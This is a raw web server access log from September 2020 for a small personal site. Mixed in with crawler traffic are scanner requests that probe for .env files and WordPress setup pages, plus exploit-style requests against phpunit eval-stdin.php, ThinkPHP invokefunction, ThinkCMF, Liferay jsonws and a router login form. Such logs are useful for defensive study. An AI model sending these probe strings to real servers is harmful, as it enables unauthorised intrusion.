rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:28 +0000] "GET /administrator/language/en-GB/install.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:28 +0000] "GET /plugins/system/debug/debug.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:29 +0000] "GET /administrator/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:29 +0000] "GET /misc/ajax.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:30 +0000] "GET /admin/view/javascript/common.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:30 +0000] "GET /admin/includes/general.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:30 +0000] "GET /images/editor/separator.gif HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:31 +0000] "GET /js/header-rollup-554.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:31 +0000] "GET /vendor/phpunit/phpunit/build.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 40.89.147.45 - - [11/Sep/2020:21:20:31 +0000] "GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:32 +0000] "GET /.env HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:20:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0" 40.89.147.45 - - [11/Sep/2020:21:20:32 +0000] "GET /wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:20:33 +0000] "GET /wordpress/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:20:33 +0000] "GET /wp/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:20:33 +0000] "GET /blog/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:20:34 +0000] "GET /test/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:20:34 +0000] "GET /site/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 146.115.136.157 - - [11/Sep/2020:21:22:36 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 146.115.136.157 - - [11/Sep/2020:21:22:36 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 52.204.27.85 - - [11/Sep/2020:21:22:56 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 40211 "" "Mozilla/5.0 (compatible)" 54.198.55.229 - - [11/Sep/2020:21:22:58 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 50995 "" "Mozilla/5.0 (compatible)" 52.204.27.85 - - [11/Sep/2020:21:23:03 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 266240 "" "Mozilla/5.0 (compatible)" 54.198.55.229 - - [11/Sep/2020:21:23:09 +0000] "GET /ac0xl/dont-Be-evil/fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible)" 54.198.55.229 - - [11/Sep/2020:21:23:09 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 48299 "" "Mozilla/5.0 (compatible)" 146.115.136.157 - - [11/Sep/2020:21:25:31 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 146.115.136.157 - - [11/Sep/2020:21:25:36 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 66.249.79.207 - - [11/Sep/2020:21:29:12 +0000] "GET /ads.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 186.154.34.78 - - [11/Sep/2020:21:33:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 40.89.147.45 - - [11/Sep/2020:21:55:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:06 +0000] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:06 +0000] "GET /administrator/help/en-GB/toc.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:07 +0000] "GET /administrator/language/en-GB/install.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:07 +0000] "GET /plugins/system/debug/debug.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:07 +0000] "GET /administrator/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:08 +0000] "GET /misc/ajax.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:09 +0000] "GET /admin/view/javascript/common.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:10 +0000] "GET /admin/includes/general.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:10 +0000] "GET /images/editor/separator.gif HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:10 +0000] "GET /js/header-rollup-554.js HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:10 +0000] "GET /vendor/phpunit/phpunit/build.xml HTTP/1.1" 404 0 "" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 40.89.147.45 - - [11/Sep/2020:21:55:11 +0000] "GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:11 +0000] "GET /.env HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" 40.89.147.45 - - [11/Sep/2020:21:55:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0" 40.89.147.45 - - [11/Sep/2020:21:55:12 +0000] "GET /wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:55:12 +0000] "GET /wordpress/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:55:12 +0000] "GET /wp/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:55:13 +0000] "GET /blog/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:55:13 +0000] "GET /test/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 40.89.147.45 - - [11/Sep/2020:21:55:14 +0000] "GET /site/wp-admin/setup-config.php?step=0 HTTP/1.1" 404 0 "" "python-requests/2.24.0" 47.111.19.40 - - [11/Sep/2020:22:09:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 51.6.96.187 - - [11/Sep/2020:22:27:39 +0000] "GET /ac0xl/www/Web-demo~1994/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" 51.6.96.187 - - [11/Sep/2020:22:27:41 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" 66.249.79.209 - - [11/Sep/2020:22:30:24 +0000] "GET /ac0xl/www/slackbook/basic-network-commands-ftp.html HTTP/1.1" 200 9338 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 195.54.160.21 - - [11/Sep/2020:22:33:26 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 142.93.211.211 - - [11/Sep/2020:22:54:16 +0000] "GET / HTTP/1.1" 200 25000 "" "" 40.89.147.45 - - [11/Sep/2020:23:09:18 +0000] "GET /user/login HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:19 +0000] "GET /wp-login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:19 +0000] "GET /administrator HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:20 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:20 +0000] "GET /wp-admin/install.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:09:20 +0000] "GET /installation/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 46.148.199.194 - - [11/Sep/2020:23:10:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.249.79.209 - - [11/Sep/2020:23:21:04 +0000] "GET /ac0xl/www/slackbook/archive-files-bzip2.html HTTP/1.1" 200 4361 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 40.89.147.45 - - [11/Sep/2020:23:21:53 +0000] "GET /user/login HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:53 +0000] "GET /wp-login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:54 +0000] "GET /administrator HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:55 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:55 +0000] "GET /wp-admin/install.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:21:55 +0000] "GET /installation/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 66.249.79.205 - - [11/Sep/2020:23:41:05 +0000] "GET /ac0xl/www/2009-GreenRiver.UT/sterling.webiness.com/law2/676.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 40.89.147.45 - - [11/Sep/2020:23:41:56 +0000] "GET /user/login HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:41:58 +0000] "GET /wp-login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:41:59 +0000] "GET /administrator HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:42:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:42:04 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:42:08 +0000] "GET /wp-admin/install.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 40.89.147.45 - - [11/Sep/2020:23:42:13 +0000] "GET /installation/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 195.54.160.21 - - [11/Sep/2020:23:50:49 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.172.110.223 - - [12/Sep/2020:00:03:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 120.25.147.62 - - [12/Sep/2020:00:17:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 66.249.79.205 - - [12/Sep/2020:00:20:53 +0000] "GET /ac0xl/www/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.209 - - [12/Sep/2020:00:51:04 +0000] "GET /ac0xl/Dont-Be-Evil/Machine%20Learning%20Fairness/Definition%20of%20Algorithmic%20Unfairness%20-%20PRIVILEGED.pdf HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 71.6.232.2 - - [12/Sep/2020:01:09:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 191.34.209.189 - - [12/Sep/2020:01:19:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 156.96.118.124 - - [12/Sep/2020:01:41:51 +0000] "HEAD /ac0xl/Dont-Be-Evil/Fake%20News/Google%20Resume%20-%20Maricia%20Scott.pdf HTTP/1.1" 200 0 "" "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36" 156.96.118.124 - - [12/Sep/2020:01:41:52 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Google%20Resume%20-%20Maricia%20Scott.pdf HTTP/1.1" 200 176358 "" "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36" 172.104.108.109 - - [12/Sep/2020:02:02:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 103.145.13.124 - - [12/Sep/2020:02:19:35 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.47" 183.136.225.56 - - [12/Sep/2020:02:30:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)" 66.249.79.207 - - [12/Sep/2020:02:31:13 +0000] "GET /ac0xl/logs/2020.05.07 HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.209 - - [12/Sep/2020:02:41:13 +0000] "GET /ac0xl/DavidStraight/It%20is%20written%2C%20My%20house%20is%20the%20house%20of%20prayer.html HTTP/1.1" 304 0 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.205 - - [12/Sep/2020:02:51:23 +0000] "GET /freedom/freedom-2020-01-08/freedom/thttpd-extras/sitemap.xml.txt HTTP/1.1" 200 186 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.79.205 - - [12/Sep/2020:03:01:23 +0000] "GET /ac0xl/logs/2019.11.29 HTTP/1.1" 200 7640 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 94.102.51.119 - - [12/Sep/2020:03:16:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 148.72.158.255 - - [12/Sep/2020:04:24:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 186.154.33.252 - - [12/Sep/2020:04:52:10 +0000] "GET / HTTP/1.1" 400 0 "" "" 156.96.112.211 - - [12/Sep/2020:05:02:47 +0000] "GET / HTTP/1.1" 200 25000 "" "" 120.192.92.170 - - [12/Sep/2020:06:40:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 195.54.160.21 - - [12/Sep/2020:06:56:33 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [12/Sep/2020:07:12:30 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 54.242.169.9 - - [12/Sep/2020:07:12:34 +0000] "GET /ac0xl/logs/2020.06.1'A=0 HTTP/1.1" 404 0 "http://162.250.19.7/ac0xl/logs/2020.06.1'A=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" 136.243.136.201 - - [12/Sep/2020:07:24:03 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Semanticbot/1.0; +http://sempi.tech/bot.html)" 136.243.136.201 - - [12/Sep/2020:07:24:13 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 266240 "" "Mozilla/5.0 (compatible; Semanticbot/1.0; +http://sempi.tech/bot.html)" 212.83.128.2 - - [12/Sep/2020:07:26:32 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 195.54.160.21 - - [12/Sep/2020:07:30:37 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.21 - - [12/Sep/2020:07:37:39 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 66.249.79.205 - - [12/Sep/2020:08:11:19 +0000] "GET /ac0xl/logs/2020.06.22 HTTP/1.1" 200 8351 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 196.52.43.124 - - [12/Sep/2020:08:25:29 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 196.40.124.178 - - [12/Sep/2020:08:53:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 45.148.10.28 - - [12/Sep/2020:09:03:45 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 0 "http://162.250.19.7:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 80.82.77.240 - - [12/Sep/2020:09:16:45 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 47.111.19.40 - - [12/Sep/2020:09:26:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 91.216.213.254 - - [12/Sep/2020:09:32:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 92.118.161.29 - - [12/Sep/2020:09:54:39 +0000] "GET / HTTP/1.1" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 162.142.125.34 - - [12/Sep/2020:10:17:38 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 162.142.125.34 - - [12/Sep/2020:10:17:40 +0000] "GET / HTTP/1.1" 200 25000 "" "" 162.142.125.34 - - [12/Sep/2020:10:17:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 66.249.73.113 - - [12/Sep/2020:10:31:26 +0000] "GET /ac0xl/www/slackbook/file-commands-pagers.html HTTP/1.1" 200 5798 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 80.216.149.159 - - [12/Sep/2020:10:35:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 51.6.96.187 - - [12/Sep/2020:10:37:51 +0000] "GET /ac0xl/www/Web-demo~1994/maze/ HTTP/1.1" 200 2733 "http://162.250.19.7/ac0xl/www/Web-demo~1994/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" 51.6.96.187 - - [12/Sep/2020:10:38:00 +0000] "GET /ac0xl/www/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/www/Web-demo~1994/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" 51.6.96.187 - - [12/Sep/2020:10:38:07 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/www/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" 60.191.125.35 - - [12/Sep/2020:10:45:10 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.125.35 - - [12/Sep/2020:10:45:11 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 195.54.160.21 - - [12/Sep/2020:11:25:46 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" Sat Sep 12 06:26:40 